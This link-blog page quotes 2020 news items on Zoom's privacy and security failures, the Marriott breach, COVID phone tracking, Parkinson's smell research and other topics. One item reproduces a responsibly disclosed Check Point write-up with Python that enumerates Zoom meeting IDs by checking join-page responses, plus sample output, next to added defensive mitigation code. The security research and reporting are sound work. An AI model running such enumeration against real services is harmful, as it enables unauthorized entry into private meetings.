The Linkielist

Linking ideas with the world

Ubisoft offers free games to encourage you to stay at home

Ubisoft thinks it has a simple way to encourage people to stay at home and wait out the COVID-19 pandemic: shower them with games. It’s running a month-long campaign that will give away free games, trials, discounts and other offers to give you something to do while you’re cooped up. It’s starting things off by offering the PC version of Rayman Legends for free on Uplay from now through April 3rd. It’s an old title, to be sure, but it might hit the spot if you’re looking for an upbeat game to remind you that things will get better.

Future offers will be available through Ubisoft’s Free Events site.

There’s no doubt that Ubi is using this partly as a promotional tool for its catalog. You might try a game you skipped the first time around, or might feel compelled to subscribe to Uplay+ to see more. At the same time, it might be particularly useful in some households. Not everyone has a backlog of games to burn through until lockdowns come to an end, let alone the money to buy more.

Source: Ubisoft offers free games to encourage you to stay at home | Engadget

Marriott Hotels hacked AGAIN: Two compromised employee logins abused to siphon off guests’ personal info

Marriott Hotels has suffered its second data spillage in as many years after an “unexpected amount” of guests’ data was accessed through two compromised employee logins, the under-fire chain has confirmed.

The size of the latest data exposure has not been disclosed, though Marriott admitted it seemed to have started in January 2020 and was detected “at the end of February.”

“We identified that an unexpected amount of guest information may have been accessed using the login credentials of two employees at a franchise property,” said Marriott, without identifying which of its 6,900 hotels worldwide was at the epicenter of the intrusion.

“Upon discovery, we confirmed that the login credentials were disabled, immediately began an investigation, implemented heightened monitoring, and arranged resources to inform and assist guests,” it continued.

Marriott did not explain why it took four weeks to begin alerting customers about the digital break-in.

Stolen data included name, postal and email addresses, phone numbers, Bonvoy loyalty card balance, gender, date of birth, linked loyalty scheme information from other companies and room/personal preferences.

The hotel chain asserted that credit card data, PINs, passport and driver’s licence information was not accessed by the hackers, whose identities are so far unknown.

Source: Marriott Hotels hacked AGAIN: Two compromised employee logins abused to siphon off guests’ personal info • The Register

Zoom is Leaking Peoples’ Email Addresses and Photos to Strangers

Popular video-conferencing Zoom is leaking personal information of at least thousands of users, including their email address and photo, and giving strangers the ability to attempt to start a video call with them through Zoom.

The issue lies in Zoom’s “Company Directory” setting, which automatically adds other people to a user’s lists of contacts if they signed up with an email address that shares the same domain. This can make it easier to find a specific colleague to call when the domain belongs to an individual company. But multiple Zoom users say they signed up with personal email addresses, and Zoom pooled them together with thousands of other people as if they all worked for the same company, exposing their personal information to one another.

“I was shocked by this! I subscribed (with an alias, fortunately) and I saw 995 people unknown to me with their names, images and mail addresses.” Barend Gehrels, a Zoom user impacted by the issue and who flagged it to Motherboard, wrote in an email.

Gehrels provided a redacted screenshot of him logged into Zoom with the nearly 1000 different accounts listed in the “Company Directory” section. He said these were “all people I don’t know of course.” He said his partner had the same issue with another email provider, and had over 300 people listed in her own contacts.

“If you subscribe to Zoom with a non-standard provider (I mean, not Gmail or Hotmail or Yahoo etc), then you get insight to ALL subscribed users of that provider: their full names, their mail addresses, their profile picture (if they have any) and their status. And you can video call them,” Gehrels said. A user still has to accept the call from the stranger for it to start, however.

A redacted screenshot of the Company Directory issue provided by Gehrels. Image: Motherboard

On its website, Zoom says, “By default, your Zoom contacts directory contains internal users in the same organization, who are either on the same account or who’s email address uses the same domain as yours (except for publicly used domains including gmail.com, yahoo.com, hotmail.com, etc) in the Company Directory section.”

Zoom’s system does not exempt all domains that are used for personal email, however. Gehrels said he encountered the issue with the domains xs4all.nl, dds.nl, and quicknet.nl. These are all Dutch internet service providers (ISPs) which offer email services.

On Twitter Motherboard found other instances of Dutch users reporting the same issue.

“I just had a look at the free for private use version of Zoom and registered with my private email. I now got 1000 names, email addresses and even pictures of people in the company Directory. Is this intentional?,” one user tweeted last week along with a screenshot.

Dutch ISP XS4ALL tweeted in response to a complaint on Sunday, “This is something we cannot disable. You could see if Zoom can help you with this.”

Dutch ISP DDS told Motherboard in an email it was aware of the issue, but hadn’t heard directly from any of their own customers about it.

“Zoom maintains a blacklist of domains and regularly proactively identifies domains to be added,” a Zoom spokesperson told Motherboard. “With regards to the specific domains that you highlighted in your note, those are now blacklisted.” They also pointed to a section of the Zoom website where users can request other domains to be removed from the Company Directory feature.
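As an added illustration (written for this page, not Zoom’s code), the grouping rule the article describes, deny-list of shared providers and everything else pooled by domain, next to the allow-list rule a defender would prefer: pool only domains an account admin has proved ownership of. The accounts are constructed; xs4all.nl and dds.nl are the ISP domains named above, and every local part is made up.

```python
from collections import defaultdict

# Constructed sample sign-ups. xs4all.nl and dds.nl are the Dutch ISPs named in
# the article; all local parts are invented.
ACCOUNTS = [
    "alice@example-corp.com", "bob@example-corp.com",
    "jan@xs4all.nl", "piet@xs4all.nl", "kees@xs4all.nl",
    "marie@dds.nl", "sanne@dds.nl",
    "carol@gmail.com", "dave@gmail.com",
]

# The kind of shared-provider deny-list Zoom described (gmail.com, yahoo.com, ...).
PUBLIC_DOMAINS = {"gmail.com", "yahoo.com", "hotmail.com"}


def domain_of(email):
    return email.rsplit("@", 1)[1].lower()


def directory_by_denylist(accounts, public_domains):
    """Behaviour the article describes: any domain not on the deny-list is treated
    as one company, so an unlisted ISP pools strangers into each other's contacts."""
    groups = defaultdict(set)
    for email in accounts:
        if domain_of(email) not in public_domains:
            groups[domain_of(email)].add(email)
    return dict(groups)


def directory_by_verified_domain(accounts, verified_domains):
    """Safer default: only a domain whose ownership an account admin has proved
    (typically via a DNS record) is pooled; nobody else gets an auto-filled directory."""
    groups = defaultdict(set)
    for email in accounts:
        if domain_of(email) in verified_domains:
            groups[domain_of(email)].add(email)
    return dict(groups)


def visible_to(directory, email):
    """Other accounts this user can see (and cold-call) without having added them."""
    return directory.get(domain_of(email), set()) - {email}
```

Extending the deny-list with a newly reported domain, which is the fix the spokesperson describes, closes that one domain and leaves every other unlisted provider pooled.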

Source: Zoom is Leaking Peoples’ Email Addresses and Photos to Strangers – VICE

Zoom: how you were able to join random meetings due to incredibly poor security design

In this publication we describe a technique which would have allowed a threat actor to potentially identify and join active meetings.

All the details discussed in this publication were responsibly disclosed to Zoom Video Communications, Inc. In response, Zoom introduced a number of mitigations, so this attack is no longer possible.

The Problem

If you use Zoom, you may already know that Zoom Meeting IDs are composed of 9, 10 or 11 digits. The problem was that if you hadn’t enabled the “Require meeting password” option or the Waiting Room, which lets the host admit participants manually, these 9, 10 or 11 digits were the only thing that secured your meeting, i.e. the only thing preventing an unauthorized person from connecting to it.


Let Me Guess…
The first thing we did was pre-generate the list of potentially valid Zoom Meeting IDs. We took 1000 “random” Meeting IDs and prepared the URL string for joining the meeting here as well:

from random import randint

# Pre-generate 1000 candidate join URLs from "random" Meeting IDs.
urls = []
for _ in range(1000):
    urls.append("https://zoom.us/j/{}".format(randint(100000000, 9999999999)))

But how could we determine whether a Zoom Meeting ID represented a valid meeting or not? We discovered a fast and easy way to check this, based on the following “div” element present in the HTML body of the response returned when accessing the “Join Meeting” URL (https://zoom.us/j/{MEETING_ID}):

<div id="join-errormsg" class="error"><i></i><span>Invalid meeting ID.</span></div>

I Found It!
We then tried to automate the described approach (just in case you don’t want to brute force all the Meeting IDs by hand):

# Runs inside a crawler's generator method in the original; each request's
# response is handed to parseResponse.
for url in urls:
    yield MakeHTTPRequest(url=url, callback=parseResponse)

def MakeHTTPRequest(url, callback):
    # Body omitted in the original write-up.
    pass

def parseResponse(response):
    # The error div is only present when the Meeting ID is invalid.
    if response.css('div#join-errormsg').get() is None:
        print('Valid Meeting ID found: {}'.format(response.url))
    else:
        print('Invalid Meeting ID')

…and look at the output:

Invalid Meeting ID
Invalid Meeting ID
Valid Meeting ID found: https://zoom.us/j/22XXX41X8
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Valid Meeting ID found: https://zoom.us/j/8XXX34XXX9
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Valid Meeting ID found: https://zoom.us/j/93XXX9XXX5
Invalid Meeting ID
Invalid Meeting ID

Bingo!

Results
We were able to predict ~4% of randomly generated Meeting IDs, which is a very high chance of success compared to pure brute force.

Mitigation

We contacted Zoom on July 22, 2019 as part of a responsible disclosure process and proposed the following mitigations:
1. Re-implement the generation algorithm of Meeting IDs.
2. Replace the randomization function with a cryptographically strong one.
3. Increase the number of digits/symbols in the Meeting IDs.
4. Force hosts to use passwords/PINs/SSO for authorization purposes.

Zoom representatives were very collaborative and responded quickly to our emails. Here is the list of changes that were introduced to the Zoom client/infrastructure following our disclosure:

  1. Passwords are added by default to all future scheduled meetings.
  2. Users are able to add a password to already-scheduled future meetings and have received instructions by email on how to do so. See this article for instructions: https://support.zoom.us/hc/en-us/articles/360033331271-Account-Setting-Update-Password-Default-for-Meeting-and-Webinar
  3. Password settings are enforceable at the account level and group level by the account admin.
  4. Zoom will no longer automatically indicate if a meeting ID is valid or invalid. For each attempt, the page will load and attempt to join the meeting. Thus, a bad actor will not be able to quickly narrow the pool of meetings to attempt to join.
  5. Repeated attempts to scan for meeting IDs will cause a device to be blocked for a period of time.
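As an added example (written for this page, not Zoom’s or Check Point’s code), a constructed model of the join endpoint that carries the changes listed above: CSPRNG-backed fixed-width IDs, a default password, a reply that never reveals whether an ID exists, and per-client blocking of repeated probing. The thresholds (10 attempts per 60 s, 600 s block) and the password format are assumptions, and `hit_probability` shows how small the hit rate for uniformly drawn IDs would be, which is what makes the observed ~4% the tell-tale of a weak generator.

```python
"""Constructed model of a meeting-join endpoint with the mitigations listed
above. Illustrative code written for this page, not Zoom's or Check Point's."""
import secrets
import time
from collections import defaultdict


def keyspace(ndigits):
    """Number of fixed-width IDs with `ndigits` digits and no leading zero."""
    return 9 * 10 ** (ndigits - 1)


def hit_probability(active_meetings, ndigits):
    """Chance that one random guess names a live meeting when IDs are drawn
    uniformly. The ~4% hit rate Check Point observed on 9-11 digit IDs is far
    above this, which is why the generator itself headed the mitigation list."""
    return active_meetings / keyspace(ndigits)


def generate_meeting_id(ndigits=11):
    """Mitigations 1-3: CSPRNG-backed, uniform over the whole fixed-width range."""
    return str(10 ** (ndigits - 1) + secrets.randbelow(keyspace(ndigits)))


class JoinService:
    """Server side of the join URL as seen by someone who only sends requests.
    Thresholds (10 attempts per 60 s, 600 s block) are assumptions of the model."""

    def __init__(self, max_attempts=10, window_s=60.0, block_s=600.0):
        self.meetings = {}                    # meeting id -> password (None = open)
        self.attempts = defaultdict(list)     # client -> timestamps of attempts
        self.blocked_until = {}               # client -> monotonic deadline
        self.admitted = set()                 # (client, meeting id), host-visible
        self.max_attempts = max_attempts
        self.window_s = window_s
        self.block_s = block_s

    def schedule(self, ndigits=11, require_password=True):
        """Change 1: a password is generated by default; returns (id, password)."""
        mid = generate_meeting_id(ndigits)
        pw = secrets.token_urlsafe(8) if require_password else None
        self.meetings[mid] = pw
        return mid, pw

    def _rate_limited(self, client, now):
        """Change 5: a device that keeps probing is blocked for a while."""
        if self.blocked_until.get(client, 0.0) > now:
            return True
        recent = [t for t in self.attempts[client] if now - t < self.window_s]
        recent.append(now)
        self.attempts[client] = recent
        if len(recent) > self.max_attempts:
            self.blocked_until[client] = now + self.block_s
            return True
        return False

    def join(self, client, meeting_id, password=None, now=None):
        """Change 4: the reply never says whether the ID exists. Admission is
        recorded server-side; the requester sees only 'joining' or 'blocked'."""
        now = time.monotonic() if now is None else now
        if self._rate_limited(client, now):
            return "blocked"
        expected = self.meetings.get(meeting_id)
        # Always run the constant-time compare, against a throwaway value when
        # the ID is unknown or the meeting is open, so no branch skips the work.
        reference = expected if expected is not None else secrets.token_urlsafe(8)
        match = secrets.compare_digest(reference, password or "")
        if meeting_id in self.meetings and (expected is None or match):
            self.admitted.add((client, meeting_id))
        return "joining"


def simulate_probe(service, client, guesses, start=0.0):
    """Replay guessed IDs one second apart and report what the prober learns:
    the distinct replies it saw and the index at which it was blocked."""
    seen = set()
    for i, mid in enumerate(guesses):
        reply = service.join(client, mid, now=start + i)
        seen.add(reply)
        if reply == "blocked":
            return seen, i
    return seen, len(guesses)


if __name__ == "__main__":
    svc = JoinService()
    mid, pw = svc.schedule()
    print("host joins own meeting:", svc.join("host", mid, pw), ("host", mid) in svc.admitted)
    guesses = [generate_meeting_id(9) for _ in range(1000)]
    print("prober sees:", simulate_probe(svc, "scanner", guesses))
    print("p(hit) with 10k live 11-digit meetings:", hit_probability(10_000, 11))
```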

Source: Zoom-Zoom: We Are Watching You – Check Point Research

FBI Issues Warning, NY Attorney General Makes Inquiry After Wave of Zoom Hijackings

The FBI has issued a warning about video messaging service Zoom, and New York Attorney General’s office has made an inquiry into its cybersecurity practices, after a string of disturbing incidents involving takeovers of teleconferences.

Per Agence France-Presse, malicious individuals have been taking advantage of lax security and the surge in teleconferencing during the coronavirus pandemic to pull off a trick called “Zoombombing,” in which they can join any public meeting and use the app’s screen-sharing mode to broadcast whatever they want. All Zoom meetings are public by default, and as the Verge noted, the settings to restrict screen sharing to the host of a meeting (or turn it off after a meeting starts) are hidden under menus. This means that anyone who forgets to tweak these settings, which appears to be an awful lot of people, is vulnerable to Zoombombing.

Trolls have eagerly taken the opportunity to hijack Zoom meetings and broadcast pornography, slurs, and Nazi imagery to everything from religious institutions and corporate meetings to classrooms at schools. In one incident, someone took over a Chipotle meeting on Zoom featuring musician Lauv and promptly flooded it with hardcore porn. Zoom, which has experienced an explosion in downloads during the ongoing period of social distancing, has seemed caught off guard.

On Monday, the FBI’s Boston office issued a warning that it “has received multiple reports of conferences being disrupted by pornographic and/or hate images and threatening language. As individuals continue the transition to online lessons and meetings, the FBI recommends exercising due diligence and caution in your cybersecurity efforts.” In the warning, it noted one Massachusetts incident in which an individual joined an online high school classroom hosted on Zoom to yell profanities and reveal the teacher’s home address. Another school reported an incident to the FBI in which a man with “swastika tattoos” joined a meeting; the FBI told anyone who has had a Zoom call hijacked to contact its Internet Crime Complaint Center.

A spokesperson for the NY Attorney General’s office told AFP that they had sent a letter to Zoom “with a number of questions to ensure the company is taking appropriate steps to ensure users’ privacy and security.” The spokesperson added that they were “trying to work with the company” to prevent future incidents.

This isn’t the first time Zoom has come under scrutiny. On Tuesday, a report in the Intercept found that the service claims end-to-end encryption for video meetings joined without a mobile device, but it actually uses transport encryption, allowing Zoom developers to access unencrypted audio and video content of meetings. (The Intercept noted that unlike Google, Facebook, and Microsoft, Zoom does not publish transparency reports on how many law enforcement requests for data it receives or how many it complies with.)

Zoom also recently pushed an update to nix code that sent analytics data to Facebook’s Graph API (even when Zoom users didn’t have an account on the social network) under a privacy policy that didn’t make the extent of the sharing clear. That is currently the subject of a class action lawsuit, though whether or not the suit is viable is another question. Zoom also eventually caved last year and patched a “click-to-join” feature that installed insecure local web servers on Mac machines that weren’t deleted when the app was removed, allowing remote access to the webcams of any Mac that had current or previous installations of Zoom. The company had initially defended it as a convenience feature.

“We work 24 hours a day to ensure that hospitals, universities, schools and other companies can be connected and operational,” a Zoom spokesperson told AFP. “We appreciate the interest of the New York prosecutor in these matters and are happy to deliver the requested information.”

Source: FBI Issues Warning, NY Attorney General Makes Inquiry After Wave of Zoom Hijackings

Zoom Meetings Aren’t End-to-End Encrypted, Despite Misleading Marketing. Also, they mine your data with vampire teeth.

Zoom, the video conferencing service whose use has spiked amid the Covid-19 pandemic, claims to implement end-to-end encryption, widely understood as the most private form of internet communication, protecting conversations from all outside parties. In fact, Zoom is using its own definition of the term, one that lets Zoom itself access unencrypted video and audio from meetings.

With millions of people around the world working from home in order to slow the spread of the coronavirus, business is booming for Zoom, bringing more attention on the company and its privacy practices, including a policy, later updated, that seemed to give the company permission to mine messages and files shared during meetings for the purpose of ad targeting.

Still, Zoom offers reliability, ease of use, and at least one very important security assurance: As long as you make sure everyone in a Zoom meeting connects using “computer audio” instead of calling in on a phone, the meeting is secured with end-to-end encryption, at least according to Zoom’s website, its security white paper, and the user interface within the app. But despite this misleading marketing, the service actually does not support end-to-end encryption for video and audio content, at least as the term is commonly understood. Instead it offers what is usually called transport encryption, explained further below.

Screenshot (The Intercept): when mousing over the green lock in the top left of the Zoom desktop app, it says, “Zoom is using an end to end encrypted connection”

In Zoom’s white paper, there is a list of “pre-meeting security capabilities” that are available to the meeting host that starts with “Enable an end-to-end (E2E) encrypted meeting.” Later in the white paper, it lists “Secure a meeting with E2E encryption” as an “in-meeting security capability” that’s available to meeting hosts. When a host starts a meeting with the “Require Encryption for 3rd Party Endpoints” setting enabled, participants see a green padlock that says, “Zoom is using an end to end encrypted connection” when they mouse over it.

But when reached for comment about whether video meetings are actually end-to-end encrypted, a Zoom spokesperson wrote, “Currently, it is not possible to enable E2E encryption for Zoom video meetings. Zoom video meetings use a combination of TCP and UDP. TCP connections are made using TLS and UDP connections are encrypted with AES using a key negotiated over a TLS connection.”

The encryption that Zoom uses to protect meetings is TLS, the same technology that web servers use to secure HTTPS websites. This means that the connection between the Zoom app running on a user’s computer or phone and Zoom’s server is encrypted in the same way the connection between your web browser and this article (on https://theintercept.com) is encrypted. This is known as transport encryption, which is different from end-to-end encryption because the Zoom service itself can access the unencrypted video and audio content of Zoom meetings. So when you have a Zoom meeting, the video and audio content will stay private from anyone spying on your Wi-Fi, but it won’t stay private from the company. (In a statement, Zoom said it does not directly access, mine, or sell user data; more below.)

Source: Zoom Meetings Do Not Support End-to-End Encryption

Oh dear.

Hacker hijacks all Microsoft and CCC YouTube accounts to broadcast crypto Ponzi scam

A hacker has hijacked all of Microsoft’s official YouTube accounts and is broadcasting a cryptocurrency Ponzi scam to the company’s subscribers, ZDNet has learned from one of our readers.

The hacks appear to have occurred about 13 hours ago, according to our source. The hijacked accounts are still streaming at the time of writing, despite being reported to YouTube’s moderators for more than one hour.

The hacker is currently live-streaming an old Bill Gates talk on startups that the former Microsoft CEO gave to an audience at Village Global in June 2019.

Hackers are live-streaming an altered version of the presentation, but also asking for viewers to participate in a classic “crypto giveaway” — where victims are tricked to send a small sum of cryptocurrency to double their earnings but never get any funds in return.

[…]

The Bitcoin address listed in the video streams did not receive any transactions or hold any funds, suggesting that no users have fallen for the scam. Based on YouTube stream stats, tens of thousands have seen the video feeds.

Microsoft was not the only organization impacted by the mass hijack and defacement incident. The Chaos Computer Club, a famous Germany-based hacking community, has also had its account hijacked to broadcast a similar message.

Source: Hacker hijacks Microsoft YouTube accounts to broadcast crypto Ponzi scam | ZDNet

Someone Convinced Google To Delist Our Entire Right To Be Forgotten Tag In The EU For Searches On Their Name, which means we can’t tell if they are abusing the system

The very fact that the tag being delisted when searching for this unnamed individual is the “right to be forgotten” tag shows that whoever this person is, they recognize that they are not trying to cover up the record of, say, an FTC case against them from… oh, let’s just say 2003… but rather are now trying to cover up their current effort to abuse the right to be forgotten process.

Anyway, in theory (purely in theory, of course) if someone in the EU searched for the name of anyone, it might be helpful to know if the Director of the FTC’s Bureau of Consumer Protection once called him a “spam scammer” who “conned consumers in two ways.” But, apparently, in the EU, that sort of information is no longer useful. And you also can’t find out that he’s been using the right to be forgotten process to further cover his tracks. That seems unfortunate, and entirely against the supposed principle behind the “right to be forgotten.” No one is trying to violate anyone’s “privacy” here. We’re talking about public court records, and an FTC complaint and later settlement on a fairly serious crime that took place not all that long ago. That ain’t private information. And, even more to the point, the much more recent efforts by that individual to then hide all the details of this public record.

Source: Someone Convinced Google To Delist Our Entire Right To Be Forgotten Tag In The EU For Searches On Their Name | Techdirt

A Woman Who Can Smell Parkinson’s, Alzheimer’s, Cancer, TBC, Is Inspiring New Research Into Diagnosis

For most of her life, Joy Milne had a superpower that she was totally oblivious to. She simply had no idea she possessed an utterly amazing, slightly terrifying biological gift that scientists would itch to study.

In fact, Joy probably would have stayed oblivious if it hadn’t been for her husband, Les Milne.

[…]

But then one day, about 10 years into the marriage, when Les was 31, he came home, and strangely, Joy says, he smelled different. “His lovely male musk smell had got this overpowering sort of nasty yeast smell,” she says.

[…]

Joy says that over the next 20 years she and Les tried to make the best of things, but it was difficult: the loss of movement, the loss of work, the slow narrowing of their world. Still, they struggled through. Then about seven years ago, they decided to attend a support group for people suffering from Parkinson’s.

“We were late. … A lot of people were there. And I walked into the room and I thought, ‘SMELL!’ ” she says.

Joy realized that the other people in the room had the same greasy, musty smell that Les had — the smell that Joy had first noticed when Les was just 31. “And then I realized for some people it smelled stronger and for other people it didn’t smell so strong,” she says.

Could it be, Joy wondered, that Parkinson’s has a smell?

As they drove home from the meeting, Joy kept puzzling it over in her head, and by the time they arrived, she’d decided she would tell her husband.

She says once she made her discovery clear, his eyes widened: “He’s a doctor — we both understood the significance. Immediately.”

To begin, this was a new scientific discovery, but also, Joy had smelled the disease on Les more than a decade before his symptoms got severe enough for them to seek medical help. If Joy could predict Parkinson’s before its well-known symptoms, such as shaking and sleep disruption, even started to appear, maybe she could work with researchers. It might lead to a breakthrough.

[…]

Kunath asked one group of people who had Parkinson’s and another group of people who didn’t have Parkinson’s to take home white T-shirts, wear them overnight and then return them.

Then Kunath gave the T-shirts to Joy to smell. “They were all given randomized numbers and put in a box, and then she was asked to take each one out and give it a score,” he says.

Was the person who wore this shirt at an early stage of Parkinson’s? In a late stage of Parkinson’s? Something in between? Or maybe the person didn’t have the disease at all.

“And she was incredibly accurate,” Kunath says.

In fact, out of all the samples, Joy made only one mistake. She identified a man in the control group, the group without Parkinson’s, as having the disease. But many months later, Kunath says, that man actually approached him at an event and said, “Tilo, you’re going to have to put me in the Parkinson’s pile because I’ve just been diagnosed.”

It was incontrovertible: Joy not only could smell Parkinson’s but could smell it even in the absence of its typical medical presentation.

Kunath and fellow scientists published their work in ACS Central Science in March 2019, listing Joy as a co-author. Their research identified certain specific compounds that may contribute to the smell that Joy noticed on her husband and other Parkinson’s patients.

[…]

Joy and her super smelling abilities have opened up a whole new realm of research, Kunath says. Researchers, including Perdita Barran at the University of Manchester, led a second, larger study and have recently found 10 compounds linked to Parkinson’s by using mass spectrometry and other techniques to analyze samples from 274 people. They’re hoping to find a way to diagnose Parkinson’s from skin-based biomarkers, according to Barran. More work is soon to come, she adds.

[…]

Joy’s superpower is so unusual that researchers all over the world have started working with her and have discovered that she can identify several kinds of illnesses — tuberculosis, Alzheimer’s disease, cancer and diabetes.

Source: A Woman Who Can Smell Parkinson’s Is Inspiring New Research Into Diagnosis : Shots – Health News : NPR

US Officials Use Mobile Ad Location Data to Study How COVID-19 Spreads, not cellphone tower data

Government officials across the U.S. are using location data from millions of cellphones in a bid to better understand the movements of Americans during the coronavirus pandemic and how they may be affecting the spread of the disease…

The data comes from the mobile advertising industry rather than cellphone carriers. The aim is to create a portal for federal, state and local officials that contains geolocation data in what could be as many as 500 cities across the U.S., one of the people said, to help plan the epidemic response… It shows which retail establishments, parks and other public spaces are still drawing crowds that could risk accelerating the transmission of the virus, according to people familiar with the matter… The data can also reveal general levels of compliance with stay-at-home or shelter-in-place orders, according to experts inside and outside government, and help measure the pandemic’s economic impact by revealing the drop-off in retail customers at stores, decreases in automobile miles driven and other economic metrics.

The CDC has started to get analyses based on location data through an ad hoc coalition of tech companies and data providers — all working in conjunction with the White House and others in government, people said.

The CDC and the White House didn’t respond to requests for comment.

It’s the cellphone carriers turning over pandemic-fighting data in Germany, Austria, Spain, Belgium and the U.K., according to the article, while Israel mapped infections using its intelligence agencies’ antiterrorism phone-tracking. But so far in the U.S., “the data being used has largely been drawn from the advertising industry.

“The mobile marketing industry has billions of geographic data points on hundreds of millions of U.S. cell mobile devices…”

Source: US Officials Use Mobile Ad Location Data to Study How COVID-19 Spreads – Slashdot

I am unsure if this says more about the legality of the move or the technical decentralisation of cell phone tower data making it technically difficult to track the whole population

Israel uses anti-terrorist tech to monitor phones of virus patients

Israel has long been known for its use of technology to track the movements of Palestinian militants. Now, Prime Minister Benjamin Netanyahu wants to use similar technology to stop the movement of the coronavirus.

Netanyahu’s Cabinet on Sunday authorized the Shin Bet security agency to use its phone-snooping tactics on coronavirus patients, an official confirmed, despite concerns from civil-liberties advocates that the practice would raise serious privacy issues. The official spoke on condition of anonymity pending an official announcement.

Netanyahu announced his plan in a televised address late Saturday, telling the nation that the drastic steps would protect the public’s health, though it would also “entail a certain degree of violation of privacy.”

Israel has identified more than 200 cases of the coronavirus. Based on interviews with these patients about their movements, health officials have put out public advisories ordering tens of thousands of people who may have come into contact with them into protective home quarantine.

The new plan would use mobile-phone tracking technology to give a far more precise history of an infected person’s movements before they were diagnosed and identify people who might have been exposed.

In his address, Netanyahu acknowledged the technology had never been used on civilians. But he said the unprecedented health threat posed by the virus justified its use. For most people, the coronavirus causes only mild or moderate symptoms. But for some, especially older adults and people with existing health problems, it can cause more severe illness.

“They are not minor measures. They entail a certain degree of violation of the privacy of those same people, who we will check to see whom they came into contact with while sick and what preceded that. This is an effective tool for locating the virus,” Netanyahu said.

The proposal sparked a heated debate over the use of sensitive security technology, who would have access to the information and what exactly would be done with it.

Nitzan Horowitz, leader of the liberal opposition party Meretz, said that tracking citizens “using databases and sophisticated technological means are liable to result in a severe violation of privacy and basic civil liberties.” He said any use of the technology must be supervised, with “clear rules” for the use of the information.

Netanyahu led a series of discussions Sunday with security and health officials to discuss the matter. Responding to privacy concerns, he said late Sunday he had ordered a number of changes in the plan, including reducing the scope of data that would be gathered and limiting the number of people who could see the information, to protect against misuse.

Source: Israel takes step toward monitoring phones of virus patients – ABC News

What I’m missing is a maximum duration for these powers to be used.

Astronomers have found the edge of the Milky Way at last

Our galaxy is a whole lot bigger than it looks. New work finds that the Milky Way stretches nearly 2 million light-years across, more than 15 times wider than its luminous spiral disk. The number could lead to a better estimate of how massive the galaxy is and how many other galaxies orbit it.

Astronomers have long known that the brightest part of the Milky Way, the pancake-shaped disk of stars that houses the sun, is some 120,000 light-years across (SN: 8/1/19). Beyond this stellar disk is a disk of gas. A vast halo of dark matter, presumably full of invisible particles, engulfs both disks and stretches far beyond them (SN: 10/25/16). But because the dark halo emits no light, its diameter is hard to measure.

Now, Alis Deason, an astrophysicist at Durham University in England, and her colleagues have used nearby galaxies to locate the Milky Way’s edge. The precise diameter is 1.9 million light-years, give or take 0.4 million light-years, the team reports February 21 in a paper posted at arXiv.org.

To put that size into perspective, imagine a map in which the distance between the sun and the Earth is just one inch. If the Milky Way’s heart were at the center of the Earth, the galaxy’s edge would be four times farther away than the moon actually is.

To find the Milky Way’s edge, Deason’s team conducted computer simulations of how giant galaxies like the Milky Way form. In particular, the scientists sought cases where two giant galaxies arose side by side, like the Milky Way and Andromeda, our nearest giant neighbor, because each galaxy’s gravity tugs on the other (SN: 5/12/15). The simulations showed that just beyond the edge of a giant galaxy’s dark halo, the velocities of small nearby galaxies drop sharply (SN: 3/11/15).

Using existing telescope observations, Deason and her colleagues found a similar plunge in the speeds of small galaxies near the Milky Way. This occurred at a distance of about 950,000 light-years from the Milky Way’s center, marking the galaxy’s edge, the scientists say. The edge is 35 times farther from the galactic center than the sun is.

Although dark matter makes up most of the Milky Way’s mass, the simulations reveal that stars should also exist at these far-out distances. “Both have a well-defined edge,” Deason says. “The edge of the stars is very sharp, almost like the stars just stop at a particular radius.”

Source: Astronomers have found the edge of the Milky Way at last | Science News

Zoom Removes Code That Sends Data to Facebook – but there is still plenty of nasty stuff in there

On Friday video-conferencing software Zoom issued an update to its iOS app which stops it sending certain pieces of data to Facebook. The move comes after a Motherboard analysis of the app found it sent information such as when a user opened the app, their timezone, city, and device details to the social network giant.

When Motherboard analyzed the app, Zoom’s privacy policy did not make the data transfer to Facebook clear.

“Zoom takes its users’ privacy extremely seriously. We originally implemented the ‘Login with Facebook’ feature using the Facebook SDK in order to provide our users with another convenient way to access our platform. However, we were recently made aware that the Facebook SDK was collecting unnecessary device data,” Zoom told Motherboard in a statement on Friday.

Source: Zoom Removes Code That Sends Data to Facebook – VICE

But there is still plenty of data being hoovered up by Zoom:
Yeah, that Zoom app you’re trusting with work chatter? It lives with ‘vampires feeding on the blood of human data’

As the global coronavirus pandemic pushes the popularity of videoconferencing app Zoom to new heights, one web veteran has sounded the alarm over its “creepily chummy” relationship with tracking-based advertisers.

Doc Searls, co-author of the influential internet marketing book The Cluetrain Manifesto last century, today warned [cached] Zoom not only has the right to extract data from its users and their meetings, it can work with Google and other ad networks to turn this personal information into targeted ads that follow them across the web.

This personal info includes, and is not limited to, names, addresses and any other identifying data, job titles and employers, Facebook profiles, and device specifications. Crucially, it also includes “the content contained in cloud recordings, and instant messages, files, whiteboards … shared while using the service.”

Searls said reports outlining how Zoom was collecting and sharing user data with advertisers, marketers, and other companies, prompted him to pore over the software maker’s privacy policy to see how it processes calls, messages, and transcripts.

And he concluded: “Zoom is in the advertising business, and in the worst end of it: the one that lives off harvested personal data.

“What makes this extra creepy is that Zoom is in a position to gather plenty of personal data, some of it very intimate (for example with a shrink talking to a patient) without anyone in the conversation knowing about it. (Unless, of course, they see an ad somewhere that looks like it was informed by a private conversation on Zoom.)”

The privacy policy, as of March 18, lumps together a lot of different types of personal information, from contact details to meeting contents, and says this info may be used, one way or another, to personalize web ads to suit your interests.

“Zoom does use certain standard advertising tools which require personal data,” the fine-print states. “We use these tools to help us improve your advertising experience (such as serving advertisements on our behalf across the internet, serving personalized ads on our website, and providing analytics services) … For example, Google may use this data to improve its advertising services for all companies who use their services.”

Searls, a former Harvard Berkman Fellow, said netizens are likely unaware their information could be harvested from their Zoom accounts and video conferences for advertising and tracking across the internet: “A person whose personal data is being shed on Zoom doesn’t know that’s happening because Zoom doesn’t tell them. There’s no red light, like the one you see when a session is being recorded.

“Nobody goes to Zoom for an ‘advertising experience,’ personalized or not. And nobody wants ads aimed at their eyeballs elsewhere on the ‘net by third parties using personal information leaked out through Zoom.”

Speaking of Zoom…

